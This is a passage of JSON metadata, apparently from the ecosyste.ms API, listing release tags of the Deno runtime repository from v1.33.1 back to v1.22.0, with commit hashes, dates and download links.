ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2